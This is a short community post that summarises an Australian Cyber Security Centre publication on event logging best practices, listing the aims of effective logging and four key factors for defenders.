Hi All,
This publication defines a baseline for event logging best practices to mitigate cyber threats. It was developed by the Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) in cooperation with the following international partners:
Event logging supports the continued delivery of operations and improves the security and resilience of critical systems by enabling network visibility. This guidance makes recommendations that improve an organization's resilience in the current cyber threat environment with regard to resourcing constraints. It is of moderate technical complexity and assumes a basic understanding of event logging.
An effective event logging solution aims to: • send alerts to the network defenders responsible for monitoring when cyber security events such as critical software configuration changes are made or new software solutions are deployed • identify cyber security events that may indicate a cyber security incident, such as malicious actors employing living off the land (LOTL) techniques or lateral movement post-compromise • support incident response by revealing the scope and extent of a compromise • monitor account compliance with organizational policies • reduce alert noise, saving on costs associated with storage and query time • enable network defenders to make agile and informed decisions based on prioritization of alerts and analytics • ensure logs and the logging platforms are useable and performant for analysts.
There are four key factors to consider when pursuing logging best practices:
- enterprise-approved event logging policy
- centralised event log access and correlation
- secure storage and event log integrity
- detection strategy for relevant threats.
------------------------------
Michael Roza CPA, CISA, CIA, CC, CCSKv5, CCZTv1, MBA, EMBA, CSA
------------------------------